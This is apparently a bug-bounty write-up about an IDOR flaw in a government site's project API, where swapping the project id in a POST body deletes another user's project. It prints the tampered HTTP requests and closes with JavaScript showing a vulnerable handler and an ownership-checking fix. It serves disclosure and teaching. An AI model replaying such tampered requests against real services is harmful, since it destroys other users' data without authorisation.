IDOR Vulnerability allows attackers to delete any existing project.
Hello Hunters,
If you don’t know me, I’m 0xanas, a junior penetration tester and bug hunter on HackerOne.
I want to tell you about my first IDOR vulnerability that I discovered, and I hope that my explanation is easy for you to understand.
What’s IDOR vulnerability?
An Insecure Direct Object Reference (IDOR) vulnerability is a type of access control vulnerability that arises when an application uses user-supplied input to access objects directly. This means that an attacker can manipulate the input to access objects that they are not authorized to access.
Now, I will explain the IDOR scenario in detail.
While hunting on a government VDP on HackerOne, I found a login page hosted on a sub-subdomain of site.org using the Google dork site:*.*.site.org. I then created two accounts, one for the hacker and one for the victim, verified them, and logged into both. There was a function that allowed me to create a transportation project, which I could save by completing all five stages.
Victim Account
After creating and saving the project, the request (with a JSON body) looked as follows.
POST /api/projects HTTP/1.1
Host: sub2.sub1.site.org
Cookie: ai_user=random_chars; OAMAuthnHintCookie=1; ai_session=random_chars; jwt=jwt_token
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: application/json, text/plain
Referer: https://sub2.sub1.site.org/calculation/5
Content-Type: application/json
Content-Length: 428
Origin: https://sub2.sub1.site.org
Connection: close
{
"name":"victim",
"address":"victim",
"formInputs":"{\"PROJECT_NAME\":\"victim\",\"PROJECT_ADDRESS\":\"victim\",\"APN\":\"2332-233-232\",\"VERSION_NO\":\"victim\",\"UNITS_CONDO\":\"24234\",\"PARK_CONDO\":\"324324\",\"PARK_SPACES\":\"3431\",\"STRATEGY_PARKING_5\":4,\"STRATEGY_AFFORDABLE\":\"2\",\"STRATEGY_MIXED_USE\":true,\"STRATEGY_INFO_2\":true,\"STRATEGY_PARKING_4\":true}",
"loginId":337,
"calculationId":1
}
The response, also in JSON, returned the new project ID:
HTTP/1.1 201 Created
Content-Length: 11
Connection: close
Content-Type: application/json; charset=utf-8
Date: Fri, 18 Aug 2023 15:33:31 GMT
Access-Control-Allow-Origin: *
ETag: W/"b-pud3ttcdoWKRmNk4a1EDs6HUPB4"
X-Powered-By: Express
{
"id":3921
}
I could then open my project through a link like this: https://sub2.sub1.site.org/calculation/1/3921. The /1/ path segment refers to the first stage of the five-stage project, so you can edit it as you want.
Hacker Account
I created a new project in the same way as in the victim account and received the new project ID in the JSON response.
{
"id":4206
}
So I tried to edit the project. When I intercepted the request with Burp Suite, I found that the project ID appeared in the request (in both the URL path and the JSON body) as follows:
POST /api/projects/4206 HTTP/1.1
Host: sub2.sub1.site.org
Cookie: ai_user=random_chars; OAMAuthnHintCookie=1; ai_session=random_chars; jwt=jwt_token
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: application/json, text/plain
Referer: https://sub2.sub1.site.org/calculation/5
Content-Type: application/json
Content-Length: 428
Origin: https://sub2.sub1.site.org
Connection: close
{
"name":"hacker",
"address":"hacker",
"formInputs":"{\"PROJECT_NAME\":\"hacker\",\"PROJECT_ADDRESS\":\"hacker\",\"APN\":\"2332-233-232\",\"VERSION_NO\":\"victim\",\"UNITS_CONDO\":\"24234\",\"PARK_CONDO\":\"324324\",\"PARK_SPACES\":\"3431\",\"STRATEGY_PARKING_5\":4,\"STRATEGY_AFFORDABLE\":\"2\",\"STRATEGY_MIXED_USE\":true,\"STRATEGY_INFO_2\":true,\"STRATEGY_PARKING_4\":true}",
"loginId":340,
"calculationId":1,
"id":4206
}
Then I thought, “What would happen if I changed the project ID to another existing project ID from another account?” So I changed the ID in the body to the victim’s project ID, which was 3921, as follows.
POST /api/projects/4206 HTTP/1.1
Host: sub2.sub1.site.org
Cookie: ai_user=random_chars; OAMAuthnHintCookie=1; ai_session=random_chars; jwt=jwt_token
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: application/json, text/plain
Referer: https://sub2.sub1.site.org/calculation/5
Content-Type: application/json
Content-Length: 428
Origin: https://sub2.sub1.site.org
Connection: close
{
"name":"hacker",
"address":"hacker",
"formInputs":"{\"PROJECT_NAME\":\"hacker\",\"PROJECT_ADDRESS\":\"hacker\",\"APN\":\"2332-233-232\",\"VERSION_NO\":\"victim\",\"UNITS_CONDO\":\"24234\",\"PARK_CONDO\":\"324324\",\"PARK_SPACES\":\"3431\",\"STRATEGY_PARKING_5\":4,\"STRATEGY_AFFORDABLE\":\"2\",\"STRATEGY_MIXED_USE\":true,\"STRATEGY_INFO_2\":true,\"STRATEGY_PARKING_4\":true}",
"loginId":340,
"calculationId":1,
"id":3921
}
Boo000m! The hacker’s project ID changed from 4206 to 3921, and the victim’s project, whose ID was also 3921, was deleted automatically.
What was the impact of this vulnerability?
An attacker can delete any project by editing the project ID in the request body to match the victim’s project ID.
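As an added example (not code from this write-up or from the affected application), here is the update handler modelled two ways in plain JavaScript: the vulnerable shape, which writes to whatever id the JSON body names, and a hardened shape that takes the target from the URL path, derives the caller's identity from the server-side session instead of the body's loginId, and checks ownership before writing anything. The in-memory store, the session object and the handler names are constructed for the example.

```javascript
// Constructed in-memory store mirroring the two project IDs in the write-up.
function freshStore() {
  return new Map([
    [3921, { id: 3921, loginId: 337, name: "victim" }],
    [4206, { id: 4206, loginId: 340, name: "hacker" }],
  ]);
}

// Vulnerable shape: the record to write is chosen by the client-supplied body.id,
// and nobody checks that the caller owns it. Writing the hacker's data over 3921
// is what makes the victim's project disappear.
function updateProjectVulnerable(store, session, pathId, body) {
  const target = body.id;          // trusts the body, ignores the URL path
  store.set(target, { ...body });  // overwrites whatever lived under that ID
  return { status: 200, id: target };
}

// Hardened shape: identity comes from the server-side session (the JWT claims),
// the target comes from the URL, and the ownership check happens before any write.
function updateProjectHardened(store, session, pathId, body) {
  const id = Number(pathId);
  const existing = store.get(id);
  // Answer 404 for both "missing" and "not yours" so the response does not
  // confirm that someone else's project ID exists.
  if (!existing || existing.loginId !== session.loginId) return { status: 404 };
  // A body id that disagrees with the path is a malformed request, not a retarget.
  if (body.id !== undefined && body.id !== id) return { status: 400 };
  // The client can change its own fields, but id and loginId stay server-controlled.
  store.set(id, { ...existing, ...body, id, loginId: existing.loginId });
  return { status: 200, id };
}
```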